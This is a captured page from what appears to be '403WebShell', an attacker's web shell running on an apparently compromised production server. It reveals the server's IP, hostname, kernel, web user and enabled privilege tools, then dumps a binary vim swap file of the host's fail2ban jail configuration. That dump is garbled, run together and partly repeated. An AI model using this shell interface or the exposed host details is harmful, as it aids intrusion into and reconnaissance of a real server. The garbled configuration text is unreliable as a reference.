403WebShell

403Webshell
Server IP : 152.69.216.235 / Your IP : 80.80.80.28
Web Server : Apache/2.4.37 (Oracle Linux Server)
System : Linux ust-wp4-prod 5.15.0-310.184.5.2.el8uek.x86_64 #2 SMP Wed Jul 9 16:08:33 PDT 2025 x86_64
User : apache ( 48)
PHP Version : 8.4.10
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /etc/fail2ban/
Upload File :
[ Back ]
Current File : /etc/fail2ban/.jail.local.swp
b0VIM 8.0�+�hnV2)�rootust-wp4-prod/etc/fail2ban/jail.localutf-8
U3210#"! Utp	[��������c\��������a�# �>����������������������������~0'�ad�[����O������A?�
�
S
0
.
"



������kji^]A&%���������-�
�
�
f



�	�	�	#	����B���@���/�\4�S �bDC,+��ts%���# can be defined using space (and/or comma) separator.# will not ban a host which matches an address in this list. Several addresses# "ignoreip" can be a list of IP addresses, CIDR masks or DNS hosts. Fail2ban#ignoreself = true# (default is true). Fail2ban will not ban a host which matches such addresses.# "ignoreself" specifies whether the local resp. own IP addresses should be ignored# --------------------#bantime.overalljails = false# cross over all jails, if false (default), only current jail of the ban IP will be searched# "bantime.overalljails" (if true) specifies the search of IP in the database will be executed #bantime.multipliers = 1 5 30 60 300 720 1440 2880# for bantime=60 the multipliers are minutes and equal: 1 min, 5 min, 30 min, 1 hour, 5 hour, 12 hour, 1 day, 2 day# following example can be used for small initial ban time (bantime=60) - it grows more aggressive at begin,#bantime.multipliers = 1 2 4 8 16 32 64# always used last multiplier (64 in example), for factor '1' and original ban time 600 - 10.6 hours# following example grows ban time by 1, 2, 4, 8, 16 ... and if last ban count greater as multipliers count, # previously ban count and given "bantime.factor" (for multipliers default is 1);# "bantime.multipliers" used to calculate next value of ban time instead of formula, corresponding#bantime.formula = ban.Time * math.exp(float(ban.Count+1)*banFactor)/math.exp(1*banFactor)# more aggressive example of formula has the same values only for factor "2.0 / 2.885385" :##bantime.formula = ban.Time * (1<<(ban.Count if ban.Count<20 else 20)) * banFactor# the same ban time growing will be reached by multipliers 1, 2, 4, 8, 16, 32...# "bantime.formula" used by default to calculate next value of ban time, default value below,#bantime.factor = 1# grows by 1, 2, 4, 8, 16 ...# default value of factor is 1 and with default value of formula, the ban time # "bantime.factor" is a coefficient to calculate exponent growing of the formula or common multiplier,#bantime.maxtime = # "bantime.maxtime" is the max number of seconds using the ban time can reach (doesn't grow further)#bantime.rndtime = # to prevent "clever" botnets calculate exact time IP can be unbanned again:# "bantime.rndtime" is the max number of seconds using for mixing with random time #bantime.increment = true# default ban time using special formula, default it is banTime * 1, 2, 4, 8, 16, 32...# "bantime.increment" allows to use database for searching of previously banned ip's to increase a ## MISCELLANEOUS OPTIONS#[DEFAULT]# in each jail afterwards.# The DEFAULT allows a global definition of the options. They can be overriddenbefore = paths-fedora.conf#before = paths-distro.conf[INCLUDES]# Comments: use '#' for comment lines and ';' (following a space) for inline comments# See jail.conf(5) man page for more information## enabled = true# [sshd]## bantime = 1h# [DEFAULT]## See man 5 jail.conf for details.# ssh-iptables jail the following (uncommented) would appear in the .local file.# For example to change the default bantime for all jails and to enable the# Provide customizations in a jail.local file or a jail.d/customisation.local.## It will probably be overwritten or improved in a distribution update.## YOU SHOULD NOT MODIFY THIS FILE.## HOW TO ACTIVATE JAILS:##           or separate .conf files under jail.d/ directory, e.g.:#           file, but provide customizations in jail.local file,# Changes:  in most of the cases you should not modify this##          customize settings for your setup.# WARNING: heavily refactored in 0.9.0 release.  Please review and#ad;�'�t*��������RQ=(
�
�
�
�
�
�
t
U
T
E
���zynR/."��logpath = /var/log/monitorix-httpdport	= 8080[monitorix]banaction = %(banaction_allports)slogpath = %(syslog_local0)s[scanlogd]logpath = /var/log/traefik/access.logport    = http,https# see `filter.d/traefik-auth.conf` for details and service example.# to use 'traefik-auth' filter you have to configure your Traefik instance,[traefik-auth]logpath = %(apache_error_log)sport    = http,https# Logs auth failures to apache2 error log# Zoneminder HTTP/HTTPS web interface auth[zoneminder]backend = %(syslog_backend)slogpath = %(syslog_authpriv)sport    = http,https[phpmyadmin-syslog]logpath = /home/domino01/data/IBM_TECHNICAL_SUPPORT/console.logport    = smtp,ssmtp[domino-smtp]logpath = /var/log/slapd.logport    = ldap,ldaps[slapd]logpath  = /var/log/haproxy.log# maxretry and findtime.# See "haproxy-http-auth" filter for a brief cautionary note when setting# logs to a syslog server which would then write them to disk.# HAProxy by default doesn't log to file you'll need to set it up to forwardad��
#�����������wutfeO/.-���hWH8�
�
�
�
�
�
u
�
�
�
�
�
�
�
�
�
j
J
=
<
;
(
'

���������.-,��������{zyjiX5
�
w

�	�	�	�	�	i		���rTSA@*
�����=��������tsrb<����������n(
	���������zyxjiS)('���������`JIHF31/. 	port     = http,https[drupal-auth]### Web Applications#port     = http,httpslogpath  = /var/log/tine20/tine20.log[tine20]logpath  = /var/log/sogo/sogo.logport     = http,https# port    = 20000# without proxy this would be:# Monitor SOGo groupware server[sogo-auth]logpath  = /home/groupoffice/log/info.logport     = http,https[groupoffice]logpath  = /var/log/horde/horde.logport     = http,https[horde]logpath  = /var/log/openwebmail.logport     = http,https[openwebmail]#backend = %(syslog_backend)s# Use following line in your jail.local if roundcube logs to journal.logpath  = %(roundcube_errors_log)sport     = http,https[roundcube-auth]## Webmail and groupware servers#logpath = %(lighttpd_error_log)sport    = http,https# It catches wrong authentifications# Same as above for Apache's mod_auth[lighttpd-auth]logpath = %(suhosin_log)sport    = http,https[suhosin]          %(apache_access_log)slogpath = %(nginx_access_log)sport    = http,https[php-url-fopen]# of usage in production environments.# through GET/POST variables. - Experimental, with more than a year# Ban attackers that try to use PHP's URL-fopen() functionalitylogpath = %(nginx_access_log)sport    = http,https[nginx-bad-request]logpath  = %(nginx_error_log)sport     = http,https[nginx-botsearch]logpath = %(nginx_error_log)sport    = http,https[nginx-limit-req]# or for example see in 'config/filter.d/nginx-limit-req.conf'# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html# and define `limit_req` and `limit_req_zone` as described in nginx documentation# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module` logpath = %(nginx_error_log)sport    = http,https# mode = normal[nginx-http-auth]# See "tests/files/logs/nginx-http-auth" or "filter.d/nginx-http-auth.conf" for usage example and details.# normal (default), aggressive (combines all), auth or fallback# To use more aggressive http-auth modes set filter parameter "mode" in jail.local:logpath = /opt/openhab/logs/request.logbanaction = %(banaction_allports)sfilter = openhab[openhab-auth]maxretry = 1logpath = %(apache_error_log)sport    = http,https[apache-shellshock]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-modsecurity]ignorecommand = %(fail2ban_confpath)s/filter.d/ignorecommands/apache-fakegooglebot <ip>maxretry = 1logpath  = %(apache_access_log)sport     = http,https[apache-fakegooglebot]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-botsearch]maxretry = 2logpath  = %(apache_error_log)sport     =action   = aaction   = apache-deny[denyfile="/etc/apache2/deny_f2b.conf"]bantime  = 3600findtime = 600maxretry = 5logpath  = /var/log/httpd/ofad-access-logfilter   = apache-badbotsenabled  = true##maxretry = 1##bantime  = 48h##logpath  = %(apache_access_log)s##port     = http,https# for email addresses. The mail outputs are buffered.# Ban hosts which agent identifies spammer robots crawling the web[apache-badbots]logpath  = %(apache_error_log)sport     = http,https[apache-auth]## HTTP servers#logpath  = %(auditd_log)sport     = ssh[selinux-ssh]backend  = %(dropbear_backend)slogpath  = %(dropbear_log)sad?������������j]\[KJ4���������~]P�
�
�
�
�
�
�
�
�
�
�
�
q
R
E
D
C
4
3
"
�����A������3�
�
c
Q
<





�	�	�	�	�	�	�	K		������zyxnmX>=<,���������sr\8����������~hDCB43�������~\[ZQP*�������port     = http,https[drupal-auth]### Web Applications#port     = http,httpslogpath  = /var/log/tine20/tine20.log[tine20]logpath  = /var/log/sogo/sogo.logport     = http,https# port    = 20000# without proxy this would be:# Monitor SOGo groupware server[sogo-auth]logpath  = /home/groupoffice/log/info.logport     = http,https[groupoffice]logpath  = /var/log/horde/horde.logport     = http,https[horde]logpath  = /var/log/openwebmail.logport     = http,https[openwebmail]#backend = %(syslog_backend)s# Use following line in your jail.local if roundcube logs to journal.logpath  = %(roundcube_errors_log)sport     = http,https[roundcube-auth]## Webmail and groupware servers#logpath = %(lighttpd_error_log)sport    = http,https# It catches wrong authentifications# Same as above for Apache's mod_auth[lighttpd-auth]logpath = %(suhosin_log)sport    = http,https[suhosin]          %(apache_access_log)slogpath = %(nginx_access_log)sport    = http,https[php-url-fopen]# of usage in production environments.# through GET/POST variables. - Experimental, with more than a year# Ban attackers that try to use PHP's URL-fopen() functionalitylogpath = %(nginx_access_log)sport    = http,https[nginx-bad-request]logpath  = %(nginx_error_log)sport     = http,https[nginx-botsearch]logpath = %(nginx_error_log)sport    = http,https[nginx-limit-req]# or for example see in 'config/filter.d/nginx-limit-req.conf'# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html# and define `limit_req` and `limit_req_zone` as described in nginx documentation# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module` logpath = %(nginx_error_log)sport    = http,https# mode = normal[nginx-http-auth]# See "tests/files/logs/nginx-http-auth" or "filter.d/nginx-http-auth.conf" for usage example and details.# normal (default), aggressive (combines all), auth or fallback# To use more aggressive http-auth modes set filter parameter "mode" in jail.local:logpath = /opt/openhab/logs/request.logbanaction = %(banaction_allports)sfilter = openhab[openhab-auth]maxretry = 1logpath = %(apache_error_log)sport    = http,https[apache-shellshock]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-modsecurity]ignorecommand = %(fail2ban_confpath)s/filter.d/ignorecommands/apache-fakegooglebot <ip>maxretry = 1logpath  = %(apache_access_log)sport     = http,https[apache-fakegooglebot]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-botsearch]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-nohome]maxretry = 2logpath  = %(apache_error_log)sport     = http,https[apache-overflows]logpath  = %(apache_error_log)sport     = http,https[apache-noscript]
Youez - 2016 - github.com/yon3zu
LinuXploit